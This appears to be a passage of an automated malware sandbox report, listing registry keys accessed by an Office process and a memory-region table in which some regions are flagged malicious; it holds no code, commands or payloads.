HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
CAGFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
CAGFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
CAGFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
CAGFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\159\52C64B7E
@C:\Windows\System32\display.dll,-4
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\159\52C64B7E
@C:\Program Files\Windows Sidebar\sidebar.exe,-11100
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\159\52C64B7E
@C:\Windows\system32\themecpl.dll,-10
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
{6Q809377-6NS0-444O-8957-N3773S02200R}\Zvpebfbsg Bssvpr\Bssvpr14\RKPRY.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
{6Q809377-6NS0-444O-8957-N3773S02200R}\Zvpebfbsg Bssvpr\Bssvpr14\JVAJBEQ.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Handshake\{2B2AF159-87EA-4DB0-87E1-2E594ED3F3FE}
data
There are 450 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
81000
system
page execute and read and write
 malicious
E1000
system
page execute and read and write
 malicious
131000
unclassified section
page read and write
 malicious
110000
direct allocation
page read and write
 malicious
82D0000
trusted library section
page read and write
 malicious
3F11000
system
page execute read
 malicious
2440000
unkown
page read and write
32C3000
heap
page read and write
3580000
heap
page read and write
20C0000
trusted library allocation
page execute and read and write
3B0000
heap
page read and write
1F0000
trusted library allocation
page read and write
3870000
unkown
page read and write
222000
direct allocation
page execute and read and write
170000
trusted library allocation
page read and write
2440000
unkown
page read and write
2DBE000
heap
page read and write
222000
direct allocation
page execute and read and write
1F1000
direct allocation
page execute and read and write
26F0000
unkown
page read and write
26E0000
unkown
page read and write
2440000
unkown
page read and write
2E4000
heap
page read and write
3299000
heap
page read and write
89B000
heap
page read and write
222000
direct allocation
page execute and read and write
2440000
unkown
page read and write
70000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
1F1000
direct allocation
page execute and read and write
689000
heap
page read and write
F0000
trusted library allocation
page read and write
683B000
stack
page read and write
62D1000
trusted library allocation
page read and write
2B9E000
stack
page read and write
26F0000
unkown
page read and write
3A4E000
stack
page read and write
28E000
heap
page read and write
1CA000
heap
page read and write
32B6000
heap
page read and write
68A000
heap
page read and write
26F0000
unkown
page read and write
317E000
stack
page read and write
72A0000
unkown
page read and write
38D0000
stack
page read and write
BD000
stack
page read and write
41E0000
trusted library allocation
page read and write
295E000
stack
page read and write
22BE000
stack
page read and write
1D20000
heap
page read and write
1F1000
direct allocation
page execute and read and write
32B1000
heap
page read and write
1F1000
direct allocation
page execute and read and write
2BB0000
unkown
page read and write
26B000
heap
page read and write
222000
direct allocation
page execute and read and write
33F0000
trusted library allocation
page read and write
3420000
heap
page read and write
32AE000
heap
page read and write
10000
heap
page read and write
32B1000
heap
page read and write
200000
heap
page read and write
F0000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
2BB0000
unkown
page read and write
226000
heap
page read and write
2440000
unkown
page read and write
41E0000
trusted library allocation
page read and write
26F0000
unkown
page read and write
26E0000
unkown
page read and write
34EA000
heap
page read and write
32F000
heap
page read and write
1E3000
trusted library allocation
page execute and read and write
270000
trusted library allocation
page read and write
2AE0000
unkown
page read and write
26E0000
unkown
page read and write
4BAE000
heap
page read and write
3C80000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
222000
direct allocation
page execute and read and write
F0000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
1C4000
heap
page read and write
26E0000
unkown
page read and write
280000
heap
page read and write
2BB0000
unkown
page read and write
2BA0000
unkown
page read and write
3B97000
stack
page read and write
35F0000
heap
page read and write
2A6000
heap
page read and write
21F0000
heap
page read and write
74C0000
unkown
page read and write
32AE000
heap
page read and write
3DB1000
unkown
page read and write
26E0000
unkown
page read and write
26E0000
unkown
page read and write
86B000
stack
page read and write
26E0000
unkown
page read and write
3B0000
trusted library allocation
page read and write
222000
direct allocation
page execute and read and write
2820000
unkown
page read and write
4A00000
heap
page read and write
10000
heap
page read and write
25BE000
stack
page read and write
2440000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
61C000
heap
page read and write
1A0000
trusted library allocation
page read and write
26E0000
unkown
page read and write
3760000
unkown
page read and write
440000
heap
page read and write
32FC000
heap
page read and write
B0000
trusted library allocation
page read and write
2A7000
heap
page read and write
26F0000
unkown
page read and write
B90000
trusted library allocation
page read and write
32E5000
heap
page read and write
1D4000
heap
page read and write
10000
heap
page read and write
2820000
unkown
page read and write
31E000
stack
page read and write
3AFF000
stack
page read and write
1F1000
direct allocation
page execute and read and write
1F1000
direct allocation
page execute and read and write
4DBF000
stack
page read and write
2A1E000
trusted library allocation
page read and write
7B0000
heap
page read and write
1F1000
direct allocation
page execute and read and write
2820000
unkown
page read and write
32B6000
heap
page read and write
70000
trusted library allocation
page read and write
2440000
unkown
page read and write
2440000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
2440000
unkown
page read and write
2BB0000
unkown
page read and write
26E0000
unkown
page read and write
222000
direct allocation
page execute and read and write
7E03000
heap
page read and write
729E000
unkown
page read and write
2DA2000
heap
page read and write
222000
direct allocation
page execute and read and write
270000
trusted library allocation
page read and write
4040000
unkown
page readonly
6C1000
heap
page read and write
1B90000
heap
page read and write
225E000
stack
page read and write
26E0000
unkown
page read and write
3A50000
unkown
page readonly
70000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
88E000
heap
page read and write
69F4000
heap
page read and write
32C3000
heap
page read and write
43E0000
heap
page read and write
1A0000
trusted library allocation
page read and write
26E0000
unkown
page read and write
32C9000
trusted library allocation
page read and write
26E0000
unkown
page read and write
270000
trusted library allocation
page read and write
214000
heap
page read and write
1F0000
trusted library allocation
page read and write
32B8000
heap
page read and write
32B8000
heap
page read and write
26E0000
unkown
page read and write
907000
trusted library allocation
page read and write
26E0000
unkown
page read and write
210E000
stack
page read and write
400000
heap
page read and write
1F1000
direct allocation
page execute and read and write
2BB0000
unkown
page read and write
3EAF000
stack
page read and write
920000
trusted library allocation
page read and write
10000
heap
page read and write
CD000
stack
page read and write
26E0000
unkown
page read and write
2BD0000
unkown
page read and write
2440000
unkown
page read and write
2BB0000
unkown
page read and write
2F6000
heap
page read and write
380000
trusted library allocation
page read and write
32AE000
heap
page read and write
2440000
unkown
page read and write
6A13000
heap
page read and write
1F1000
direct allocation
page execute and read and write
226000
heap
page read and write
5B2000
heap
page read and write
1F0000
trusted library allocation
page read and write
EB000
heap
page read and write
26E0000
unkown
page read and write
3299000
heap
page read and write
5E00000
heap
page read and write
2D91000
heap
page read and write
32B6000
heap
page read and write
72A0000
unkown
page read and write
489F000
stack
page read and write
487000
heap
page read and write
2290000
heap
page read and write
630000
heap
page read and write
3B00000
unkown
page read and write
1D30000
unkown
page readonly
32B1000
heap
page read and write
683B000
stack
page read and write
26F0000
unkown
page read and write
1F0000
trusted library allocation
page read and write
F0000
trusted library allocation
page read and write
1A0000
heap
page read and write
26E0000
unkown
page read and write
2BB0000
unkown
page read and write
35C0000
heap
page read and write
1F1000
direct allocation
page execute and read and write
26F0000
unkown
page read and write
222000
direct allocation
page execute and read and write
1A0000
trusted library allocation
page read and write
3EEC000
unkown
page read and write
45E000
stack
page read and write
222000
direct allocation
page execute and read and write
47F000
stack
page read and write
2BB0000
unkown
page read and write
2235000
heap
page read and write
401D000
stack
page read and write
1F1000
direct allocation
page execute and read and write
3BC0000
unkown
page read and write
3AB0000
unkown
page read and write
41FC000
stack
page read and write
1F1000
direct allocation
page execute and read and write
270000
trusted library allocation
page read and write
B92000
trusted library allocation
page read and write
3EFE000
unkown
page read and write
2440000
unkown
page read and write
577000
heap
page read and write
68B000
heap
page read and write
1D20000
unkown
page readonly
3AC0000
unkown
page read and write
3EEE000
unkown
page read and write
26F0000
unkown
page read and write
170000
trusted library allocation
page read and write
3483000
heap
page read and write
2BB0000
unkown
page read and write
20000
heap
page read and write
1F1000
direct allocation
page execute and read and write
26F0000
unkown
page read and write
64C000
heap
page read and write
2440000
unkown
page read and write
69000
system
page execute and read and write
3C0000
trusted library allocation
page read and write
4A8E000
stack
page read and write
7979000
unkown
page read and write
2440000
unkown
page read and write
4638000
unkown
page read and write
F0000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
20B0000
heap
page read and write
2440000
unkown
page read and write
234E000
unkown
page read and write
460000
heap
page read and write
372F000
heap
page read and write
26E0000
unkown
page read and write
222000
direct allocation
page execute and read and write
32A1000
trusted library allocation
page read and write
2BB0000
unkown
page read and write
32B8000
heap
page read and write
347D000
heap
page read and write
2BB0000
unkown
page read and write
3299000
heap
page read and write
3603000
trusted library allocation
page read and write
35A000
heap
page read and write
10000
heap
page read and write
34B6000
heap
page read and write
32B1000
heap
page read and write
5E22000
heap
page read and write
2BB0000
unkown
page read and write
7948000
unkown
page read and write
1A0000
trusted library allocation
page read and write
32B6000
heap
page read and write
4C8F000
stack
page read and write
2440000
unkown
page read and write
70000
trusted library allocation
page read and write
6A4000
heap
page read and write
1F0000
trusted library allocation
page read and write
540000
heap
page read and write
26F0000
unkown
page read and write
3AD0000
unkown
page read and write
32B6000
heap
page read and write
2380000
unkown
page read and write
720A000
heap
page read and write
550000
heap
page read and write
2E0B000
heap
page read and write
26F0000
unkown
page read and write
3B97000
stack
page read and write
26D2000
unkown
page read and write
2BB0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
3549000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
2D6000
heap
page read and write
2440000
unkown
page read and write
68B000
heap
page read and write
E7000
system
page execute and read and write
26E0000
unkown
page read and write
62A1000
heap
page read and write
3470000
heap
page read and write
1B60000
heap
page read and write
2440000
unkown
page read and write
2177000
stack
page read and write
31E000
unkown
page read and write
3980000
unkown
page readonly
222000
direct allocation
page execute and read and write
2440000
unkown
page read and write
23DA000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
38B0000
unkown
page read and write
32B8000
heap
page read and write
222000
direct allocation
page execute and read and write
26E0000
unkown
page read and write
27F0000
unkown
page read and write
53F000
stack
page read and write
F0000
trusted library allocation
page read and write
2B7000
heap
page read and write
1EC0000
heap
page read and write
1DEE000
stack
page read and write
797B000
unkown
page read and write
3512000
heap
page read and write
3299000
heap
page read and write
2407000
unkown
page read and write
4DBD000
heap
page read and write
3B90000
stack
page read and write
6B90000
heap
page read and write
16C000
heap
page read and write
1F1000
direct allocation
page execute and read and write
73C0000
heap
page read and write
1D5000
trusted library allocation
page execute and read and write
32C3000
heap
page read and write
2700000
unclassified section
page read and write
2F7000
heap
page read and write
26E0000
unkown
page read and write
26E0000
unkown
page read and write
4260000
trusted library allocation
page read and write
32C3000
heap
page read and write
540000
trusted library allocation
page read and write
222000
direct allocation
page execute and read and write
49CE000
stack
page read and write
356E000
heap
page read and write
1F1000
direct allocation
page execute and read and write
594000
heap
page read and write
70000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
3601000
trusted library allocation
page read and write
256000
heap
page read and write
230F000
stack
page read and write
7D4F000
stack
page read and write
2440000
unkown
page read and write
DD000
stack
page read and write
2D7D000
heap
page read and write
693000
heap
page read and write
401E000
stack
page read and write
6699000
stack
page read and write
2440000
unkown
page read and write
47EF000
stack
page read and write
2721000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
32B8000
heap
page read and write
2E07000
heap
page read and write
1F1000
direct allocation
page execute and read and write
1F1000
direct allocation
page execute and read and write
222000
direct allocation
page execute and read and write
120000
unclassified section
page read and write
81C3000
unkown
page read and write
F0000
trusted library allocation
page read and write
208E000
stack
page read and write
2F0000
heap
page read and write
2BB0000
unkown
page read and write
20000
unkown
page readonly
222000
direct allocation
page execute and read and write
222000
direct allocation
page execute and read and write
222000
direct allocation
page execute and read and write
38F000
stack
page read and write
2440000
unkown
page read and write
32B1000
heap
page read and write
3299000
heap
page read and write
440000
trusted library allocation
page read and write
179000
stack
page read and write
720A000
heap
page read and write
2B9E000
stack
page read and write
68E000
heap
page read and write
720000
unkown
page readonly
29CA000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
3D17000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
2BB0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
3AA1000
unkown
page read and write
494000
heap
page read and write
32B8000
heap
page read and write
26E0000
unkown
page read and write
32C3000
heap
page read and write
89B000
heap
page read and write
1F1000
direct allocation
page execute and read and write
26E0000
unkown
page read and write
270000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
70000
trusted library allocation
page read and write
4A15000
heap
page read and write
222000
direct allocation
page execute and read and write
13E000
heap
page read and write
32B6000
heap
page read and write
F0000
trusted library allocation
page read and write
7DF0000
heap
page read and write
32C3000
heap
page read and write
2E00000
heap
page read and write
815000
trusted library allocation
page read and write
2E18000
heap
page read and write
5E1E000
stack
page read and write
222000
direct allocation
page execute and read and write
78D0000
unkown
page read and write
32AE000
heap
page read and write
3299000
heap
page read and write
3C70000
unkown
page readonly
3C10000
unkown
page read and write
26E0000
unkown
page read and write
1F0000
trusted library allocation
page read and write
24E0000
unkown
page read and write
1F0000
trusted library allocation
page read and write
23B0000
unkown
page read and write
8540000
heap
page read and write
236000
heap
page read and write
26E0000
unkown
page read and write
3299000
heap
page read and write
1B20000
trusted library allocation
page read and write
24F7000
trusted library allocation
page read and write
50DE000
heap
page read and write
1B40000
unkown
page read and write
32C1000
heap
page read and write
2503000
trusted library allocation
page read and write
7B7000
heap
page read and write
340000
heap
page read and write
68000
system
page execute and read and write
284B000
unkown
page read and write
2BB0000
unkown
page read and write
3C50000
unkown
page readonly
88C000
heap
page read and write
217F000
stack
page read and write
26F0000
unkown
page read and write
1F0000
trusted library allocation
page read and write
3600000
trusted library allocation
page read and write
26F0000
unkown
page read and write
4A73000
heap
page read and write
170000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
1B0000
trusted library allocation
page read and write
356E000
heap
page read and write
3EEC000
unkown
page read and write
62E000
stack
page read and write
2440000
unkown
page read and write
1B20000
trusted library allocation
page read and write
26F0000
unkown
page read and write
32B6000
heap
page read and write
43F6000
heap
page execute and read and write
33B000
unkown
page read and write
1F0000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
1D60000
heap
page read and write
2BB0000
unkown
page read and write
70000
trusted library allocation
page read and write
2B0000
trusted library allocation
page read and write
2BC0000
heap
page read and write
1A0000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
2420000
unkown
page read and write
1A0000
trusted library allocation
page read and write
43F0000
heap
page execute and read and write
263F000
stack
page read and write
50C3000
heap
page read and write
351B000
heap
page read and write
70000
trusted library allocation
page read and write
1C4E000
stack
page read and write
23D0000
unkown
page read and write
401E000
stack
page read and write
2A0000
heap
page read and write
39B0000
unkown
page read and write
222000
direct allocation
page execute and read and write
ED000
stack
page read and write
1ED000
trusted library allocation
page execute and read and write
4E0000
heap
page read and write
3AF0000
unkown
page read and write
170000
heap
page read and write
2BB0000
unkown
page read and write
170000
trusted library allocation
page read and write
26E0000
unkown
page read and write
26E0000
unkown
page read and write
26E0000
unkown
page read and write
1D2B000
heap
page read and write
23C0000
unkown
page read and write
D0000
trusted library allocation
page read and write
85F0000
heap
page read and write
6B90000
heap
page read and write
1F1000
direct allocation
page execute and read and write
1F0000
trusted library allocation
page read and write
32AE000
heap
page read and write
705E000
stack
page read and write
D90000
heap
page execute and read and write
26F0000
unkown
page read and write
22A1000
trusted library allocation
page read and write
26F0000
unkown
page read and write
32AE000
heap
page read and write
333F000
stack
page read and write
222000
direct allocation
page execute and read and write
39B0000
unkown
page read and write
2D82000
heap
page read and write
2F1C000
stack
page read and write
2FD000
stack
page read and write
F0000
